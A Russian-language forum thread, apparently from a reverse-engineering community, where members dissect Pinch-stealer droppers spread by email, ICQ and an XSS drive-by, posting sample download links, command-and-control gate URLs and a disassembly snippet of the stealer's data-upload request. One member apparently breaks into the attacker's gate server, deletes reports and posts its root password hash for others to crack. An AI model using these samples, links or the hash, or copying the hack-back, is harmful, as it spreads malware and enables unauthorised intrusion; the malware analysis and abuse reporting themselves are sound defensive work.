В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

>Дело так было:
>приходит мне письмо с текстом:Привет! Как утро? Уже похолодало, наверное скоро зима будет, а так ещё >охота теплых деньков! Я на этих выходных в парк ходила с подругой, сфоткалась там пару раз, фотку >посмотри в письме, прикольно? если сегодня будет время напиши мне.
>и файлик с_подругой.exe (даже картинка sfxовая)
>прошло время...
>и я всётаки заэкзечил эту фигню и терь чувствую что что-то не так.
>Короче, расскажите мне пожалуйста что эта штука у меня на компе делает!?

меньше нужно всяких гнилых файлов открывать...

| Сообщение посчитали полезным:

kas

Создано: 13 октября 2006 23:15:04

-----
AutoIt

| Сообщение посчитали полезным:

Вот мне нипанятна, если на сайт долбанули иксэсэс и при заходе на форум благим матом орет каспер, после его отключения реверсинга пошифрованого ява скрипта, ссыль ведет на китайчегов, основной сайт зарыт "закрыт по каим-то там причинам, свяжитесь с супортом" (перево мой). параша грузить микромодуль, который в свою очередь грузит пинча все с тогоже китайчега. НО! есть огромные подозрения что параша славянская, то бишь россейская потому что засранчег микромодуль перед попыткой качнуть пинча смотрел на доступность я.ру и маил.ру, виртуалки под рукой не было, поэтому пинча запускать не стал. так к чему я это все писал. Можт замутим тему "реверс засранчегов и иже с ними?" и аффтаров засранцев сдавать в фсб, органам респект от начальнеков, нам тоже какойнить бонус, отдельные нары например

| Сообщение посчитали полезным:

Demrak, давай, флаг в руки и барабанные палочки в жо... как говорится. попробуй выловить и зареверсить чтото сложнее пенча...

-----
Shalom ebanats!

| Сообщение посчитали полезным:

Demrak убей сибя. Никто тут никого в фсб сдавать не собирается, иначе тут бы уже весь форум посадили а тема "реверс засранчегов и иже с ними" уже существует - просто она не так немного называется - "Прислали трояна..успешно".

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

Demrak пишет:
параша грузить микромодуль

а можно файлики лицезреть?

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

К сожалению уже нет, я их недавно удалил, но принцип действия был таков, на хост подверженый xss появлялся кусок кода на яваскрипте который грузил другой кусок яваскрипта, в котором уже пробовались все уязвимости браузеров на тот момент времени (имхо), по касперу параша называлась psyme (две буквы) использовала не только adodb но и метафайл и все последующее сам скрипт который тестировал браузер на уязвимость весил достаточно прилично, если не изменяет память то около 120 килограмм, грузил с китайчегов "*.cn" exe файл, который по идее должен был сохранится в c:\mnt*** что-то там, файл (микро параша) запакован чем-то сейчас уже не вспомню но распаковывался на раз два (вроде upx), вот эта мелкая гадость смотрела на ya.ru и mail.ru и в зависимости от их работтоспособности грузила еще одну херь, которую касперь узнавал как пинч(вроде d). Дальше реверсить не стал по причине обосцаки и не наличия виртуальной машинки (засцал запускать наживую). Потом через неделю все документы по этой теме похерил так как они валялись в корне диска c:

и тупо мельтешили.

| Сообщение посчитали полезным:

Hellspawn пишет:
Demrak пишет:
параша грузить микромодуль

а можно файлики лицезреть?

Да http://viruslist.com/ http://viruslist.com/ посмотри - самое сложное, что грузит Psyme, это - Agent-даунлоадер. Ничего интересного.

| Сообщение посчитали полезным:

VA_DOS естественно ничего интересного, каспер всю эту канитель на самой зачаточной стадии попросил убить, интересно то откуда все это грузится и куда все пересылается. Вот в чем соль!

| Сообщение посчитали полезным:

Ну файлики выложи - посмотрим. У Каспера они обычно после удаления сохраняются в Резервном хранилище.

| Сообщение посчитали полезным:

бляха, не получается выложить полные листинги, кароч я обшибся, это не psyme был а remora.bg все файлы и все мои выкладки в архиве пасс 11111
Чорт еще и не дает выложить, тогда http://xmaker.ru/file.zip http://xmaker.ru/file.zip
размер около 40 килограмм, кстати все сайты до сих пор работают, насчет пинчевского гейта сказать не могу, не реверсил. (забоялся)

| Сообщение посчитали полезным:

Demrak
Не этот сайт китайчегов hxxp://xanjan.cn ?
Если оно, то уже разбирали на предыдущих страницах.
Пустую страницу якобы выдаёт или же страницу что сайт заблокирован, но на самом деле это фуфел и на этой странице до Х джавы с сплоитами.
И сервак у китайцев под это дело выделеный.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX] не там что-то типа aero.cn

| Сообщение посчитали полезным:

... уже не надо.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Только что мне в асю пришло:
Запрос авторизации
Эта программа поможет Вам получить
ответ на то, как поступить или что сделать в той или иной ситуации.
[url=HTTP://yesorno.1gb.in/soft/soft/yesorno.zip
]HTTP://yesorno.1gb.in/soft/soft/yesorno.zip
[/url]
какая-то фигня, в архиве - "yesorno.exe" - это дроппер(вроде даже криптованный чем-то), который втупую извлекает файлы в %temp% в частности у меня он извлёк только один файл - "yesorno.exe"(больше я наверное не дал, прервав его на ShellExecuteExA). То что он извлёк - написано на Delphi и паковано UPX'ом. Я его подебажил и вроде бы ничего подозрительного не нашёл. У кого какие будут соображения по этому поводу?

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

HandMill
на прошлой странице мне приходил такой же запрос авторизации с этим же файлом, правда тогда он лежал на webfile.ru
[HEX] пишет:
VAD87
Пинч с гейтом hxxp://x4kep.1gb.in/gate/gate.php

отчетов нет, так как видать какой то чайник впаривает троянчега

41393381 -rwxrwx--- 1 vhostsadm vhosts 1381 26.11.2007 09:34 gate.php
41393382 -rwxrwx--- 1 vhostsadm vhosts 648 26.11.2007 09:34 filelist.php
48171061 drwxrwx--- 2 vhostsadm vhosts 4096 15.12.2007 02:13 reps

| Сообщение посчитали полезным:

HandMill
Согласно истории должен быть Пинч (:
Твой файл пока не смотрел.

Да, действительно пинч. В аське в последнее время с этой темой (yes/no) очень часто приходят сообщения.

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Хм .... я чё-то там пинча то не нашёл...
Styx, рассказывай как нашёл и где
И действительно ли там пинч?

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

xz, я там чето ниче не нашел.. вот дельфовый файло http://uafile.com/804060 .. гляньте мб кто-нибудь еще и выложите на вирустотал, это гавно много весит..

-----
invoke OpenFire

| Сообщение посчитали полезным:

В аттаче дропнутые файлы svchost.exe и есть пинч, второй наверно нормальный, не смотрел

Дета в этом районе к гейту коннектится:
131423EF . 50 PUSH EAX ; /<%u>
131423F0 . 68 5B851413 PUSH 1314855B ; |<%s> = "Content"
131423F5 . 68 53851413 PUSH 13148553 ; |<%s> = "Content"
131423FA . 68 A6A81613 PUSH 1316A8A6 ; |<%s> = ""
131423FF . 68 19701713 PUSH 13177019 ; |Format = "POST /gate/gate.php HTTP/1.0",CR,LF,"Host: %s",CR,LF,"%s-Type: application/x-www-form-urlencoded",CR,LF,"Connection: Keep-Alive",CR,LF,"Pragma: no-cache",CR,LF,"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Info"...
13142404 . 57 PUSH EDI ; |s
13142405 . E8 00550000 CALL <JMP.&user32.wsprintfA> ; \wsprintfA

у меня он чета на вмваре падает, разбираться лень

3a39_29.12.2007_CRACKLAB.rU.tgz - dropped.7z

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Styx нихера там нету.. www.virustotal.com/ru/resultado.html?a13def1212daec99e2a2876378fcf33e

мы похоже о разный фалах говорим =) я смотрел, тот что хэнд выложил..

-----
invoke OpenFire

| Сообщение посчитали полезным:

Точно!
Ice-T речь об одних и тех же файлах. Я просто не дал дропперу дропать оставшиеся файлы Он сперва действительно извлекает нормальный ЕХЕ, и потом следом за ним - svchost.exe, который и есть пинч. Styx, спасибо за науку

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

гы.. лол)) я тоже тормознул на ShellExecute... кидесы своей тупостью сбили с толку =D

-----
invoke OpenFire

| Сообщение посчитали полезным:

Styx
Тот же пинч с тем же гейтом
x4kep.1gb.in/gate/gate.php
если хотите прикрыть лавочку письмо сюда abuse@1gb.in

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX]
Я уже писал, ответов не приходило пока, но репортов там со вчера уже навалом ...
Может кто-нить еще напишет?

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Styx, отписался, но думаю что лавку прикроют только после нового года - админы отмечают наверное

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

Если надо, то я могу покилять репорта? Надо?

Если сбрутите пасс рута, то и сервак ваш
root:!$1$NiGcJWUs$mR3vnVCoUtng/26T3e0Gg.:13452:0:99999:7:::

Ну и еще если кто будет писать письмо в абузу, то пишите сразу заодно и еще один его сайтик hxxp://www.x4kep2.1gb.in/gate/gate.php

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX]
Я килял, за день штук 30 приходит

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

В общем грохнул шлюз и отчеты. Хотя наверника этот засранец создаст заново где нить, но мы его и там достанет

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX], респект! .... нет слов .... бурные и продолжительные апплодисменты в ваш адрес!
З.Ы.: ложи сервак к чёртовой бабушке

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным: